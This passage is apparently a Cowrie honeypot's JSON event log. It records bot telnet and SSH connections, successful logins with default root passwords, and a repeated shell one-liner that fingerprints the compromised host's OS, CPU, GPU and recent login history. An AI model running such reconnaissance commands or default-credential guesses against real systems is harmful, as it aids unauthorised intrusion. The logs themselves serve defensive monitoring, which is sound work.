\"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T19:08:01.208299Z","src_ip":"212.227.235.229","session":"08feb454aa5e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:08:01.209146Z","src_ip":"212.227.235.229","session":"08feb454aa5e"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:08:01.210353Z","src_ip":"212.227.235.229","session":"08feb454aa5e"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T19:08:01.211494Z","src_ip":"212.227.235.229","session":"08feb454aa5e"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:08:01.212422Z","src_ip":"212.227.235.229","session":"08feb454aa5e"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:08:01.213267Z","src_ip":"212.227.235.229","session":"08feb454aa5e"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T19:08:01.214254Z","src_ip":"212.227.235.229","session":"08feb454aa5e"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T19:08:01.214620Z","src_ip":"212.227.235.229","session":"08feb454aa5e"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:08:01.215187Z","src_ip":"212.227.235.229","session":"08feb454aa5e"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:08:01.215686Z","src_ip":"212.227.235.229","session":"08feb454aa5e"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:08:01.216568Z","src_ip":"212.227.235.229","session":"08feb454aa5e"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:08:01.217179Z","src_ip":"212.227.235.229","session":"08feb454aa5e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T19:08:01.571035Z","src_ip":"212.227.235.229","session":"08feb454aa5e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:08:01.572090Z","src_ip":"212.227.235.229","session":"08feb454aa5e"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:08:01.573295Z","src_ip":"212.227.235.229","session":"08feb454aa5e"}
{"eventid":"cowrie.session.closed","duration":12.996556520462036,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:08:02.570093Z","src_ip":"102.212.42.184","session":"d27359d408b5"}
{"eventid":"cowrie.session.connect","src_ip":"102.212.42.184","src_port":37196,"dst_ip":"1.2.3.4","dst_port":23,"session":"75b5b9ee9284","protocol":"telnet","message":"New connection: 102.212.42.184:37196 (1.2.3.4:23) [session: 75b5b9ee9284]","sensor":"my-vps","timestamp":"2025-09-08T19:08:02.706896Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:08:02.903815Z","src_ip":"212.227.125.160","session":"360b295fe09b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:08:03.843960Z","src_ip":"212.227.125.160","session":"360b295fe09b"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T19:08:03.844635Z","src_ip":"212.227.125.160","session":"360b295fe09b"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:08:03.846100Z","src_ip":"212.227.125.160","session":"360b295fe09b"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:08:03.847111Z","src_ip":"212.227.125.160","session":"360b295fe09b"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T19:08:03.848378Z","src_ip":"212.227.125.160","session":"360b295fe09b"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:08:03.849104Z","src_ip":"212.227.125.160","session":"360b295fe09b"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:08:03.849939Z","src_ip":"212.227.125.160","session":"360b295fe09b"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T19:08:03.851296Z","src_ip":"212.227.125.160","session":"360b295fe09b"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T19:08:03.851784Z","src_ip":"212.227.125.160","session":"360b295fe09b"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:08:03.852471Z","src_ip":"212.227.125.160","session":"360b295fe09b"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:08:03.853049Z","src_ip":"212.227.125.160","session":"360b295fe09b"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:08:03.853795Z","src_ip":"212.227.125.160","session":"360b295fe09b"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:08:03.854264Z","src_ip":"212.227.125.160","session":"360b295fe09b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T19:08:04.253855Z","src_ip":"212.227.125.160","session":"360b295fe09b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:08:04.254780Z","src_ip":"212.227.125.160","session":"360b295fe09b"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:08:04.255848Z","src_ip":"212.227.125.160","session":"360b295fe09b"}
{"eventid":"cowrie.session.closed","duration":12.750499963760376,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:08:15.457323Z","src_ip":"102.212.42.184","session":"75b5b9ee9284"}
{"eventid":"cowrie.session.connect","src_ip":"102.212.42.184","src_port":37377,"dst_ip":"1.2.3.4","dst_port":23,"session":"aeaf973f6516","protocol":"telnet","message":"New connection: 102.212.42.184:37377 (1.2.3.4:23) [session: aeaf973f6516]","sensor":"my-vps","timestamp":"2025-09-08T19:08:15.599628Z"}
{"eventid":"cowrie.session.closed","duration":13.009141683578491,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:08:28.608682Z","src_ip":"102.212.42.184","session":"aeaf973f6516"}
{"eventid":"cowrie.session.connect","src_ip":"102.212.42.184","src_port":37566,"dst_ip":"1.2.3.4","dst_port":23,"session":"a2c5f0b0724b","protocol":"telnet","message":"New connection: 102.212.42.184:37566 (1.2.3.4:23) [session: a2c5f0b0724b]","sensor":"my-vps","timestamp":"2025-09-08T19:08:28.747472Z"}
{"eventid":"cowrie.session.closed","duration":12.770792245864868,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:08:41.518188Z","src_ip":"102.212.42.184","session":"a2c5f0b0724b"}
{"eventid":"cowrie.session.connect","src_ip":"102.212.42.184","src_port":37817,"dst_ip":"1.2.3.4","dst_port":23,"session":"7b03f68a3393","protocol":"telnet","message":"New connection: 102.212.42.184:37817 (1.2.3.4:23) [session: 7b03f68a3393]","sensor":"my-vps","timestamp":"2025-09-08T19:08:41.653972Z"}
{"eventid":"cowrie.session.closed","duration":12.883049726486206,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:08:54.536950Z","src_ip":"102.212.42.184","session":"7b03f68a3393"}
{"eventid":"cowrie.session.connect","src_ip":"102.212.42.184","src_port":38005,"dst_ip":"1.2.3.4","dst_port":23,"session":"e24e0ebf73af","protocol":"telnet","message":"New connection: 102.212.42.184:38005 (1.2.3.4:23) [session: e24e0ebf73af]","sensor":"my-vps","timestamp":"2025-09-08T19:08:54.677835Z"}
{"eventid":"cowrie.session.closed","duration":12.779297351837158,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:09:07.457068Z","src_ip":"102.212.42.184","session":"e24e0ebf73af"}
{"eventid":"cowrie.session.connect","src_ip":"102.212.42.184","src_port":38199,"dst_ip":"1.2.3.4","dst_port":23,"session":"fd99a2bdddd0","protocol":"telnet","message":"New connection: 102.212.42.184:38199 (1.2.3.4:23) [session: fd99a2bdddd0]","sensor":"my-vps","timestamp":"2025-09-08T19:09:07.604901Z"}
{"eventid":"cowrie.session.closed","duration":12.914172887802124,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:09:20.519006Z","src_ip":"102.212.42.184","session":"fd99a2bdddd0"}
{"eventid":"cowrie.session.connect","src_ip":"102.212.42.184","src_port":38453,"dst_ip":"1.2.3.4","dst_port":23,"session":"ef844d7f51f6","protocol":"telnet","message":"New connection: 102.212.42.184:38453 (1.2.3.4:23) [session: ef844d7f51f6]","sensor":"my-vps","timestamp":"2025-09-08T19:09:23.675282Z"}
{"eventid":"cowrie.session.closed","duration":12.86157774925232,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:09:36.536791Z","src_ip":"102.212.42.184","session":"ef844d7f51f6"}
{"eventid":"cowrie.session.connect","src_ip":"102.212.42.184","src_port":38673,"dst_ip":"1.2.3.4","dst_port":23,"session":"6791fffa6499","protocol":"telnet","message":"New connection: 102.212.42.184:38673 (1.2.3.4:23) [session: 6791fffa6499]","sensor":"my-vps","timestamp":"2025-09-08T19:09:36.678280Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59092,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c344f1ca7a0","protocol":"ssh","message":"New connection: 212.227.235.229:59092 (1.2.3.4:22) [session: 5c344f1ca7a0]","sensor":"my-vps","timestamp":"2025-09-08T19:09:37.999758Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:09:38.000501Z","src_ip":"212.227.235.229","session":"5c344f1ca7a0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T19:09:38.300420Z","src_ip":"212.227.235.229","session":"5c344f1ca7a0"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:09:39.328318Z","src_ip":"212.227.235.229","session":"5c344f1ca7a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42436,"dst_ip":"1.2.3.4","dst_port":22,"session":"09be4c4e40b5","protocol":"ssh","message":"New connection: 212.227.125.160:42436 (1.2.3.4:22) [session: 09be4c4e40b5]","sensor":"my-vps","timestamp":"2025-09-08T19:09:39.548332Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:09:39.549362Z","src_ip":"212.227.125.160","session":"09be4c4e40b5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T19:09:39.897028Z","src_ip":"212.227.125.160","session":"09be4c4e40b5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:09:39.945133Z","src_ip":"212.227.235.229","session":"5c344f1ca7a0"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T19:09:39.945905Z","src_ip":"212.227.235.229","session":"5c344f1ca7a0"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:09:39.946471Z","src_ip":"212.227.235.229","session":"5c344f1ca7a0"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:09:39.947586Z","src_ip":"212.227.235.229","session":"5c344f1ca7a0"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T19:09:39.948930Z","src_ip":"212.227.235.229","session":"5c344f1ca7a0"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:09:39.950250Z","src_ip":"212.227.235.229","session":"5c344f1ca7a0"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:09:39.951034Z","src_ip":"212.227.235.229","session":"5c344f1ca7a0"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T19:09:39.952178Z","src_ip":"212.227.235.229","session":"5c344f1ca7a0"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T19:09:39.953053Z","src_ip":"212.227.235.229","session":"5c344f1ca7a0"}
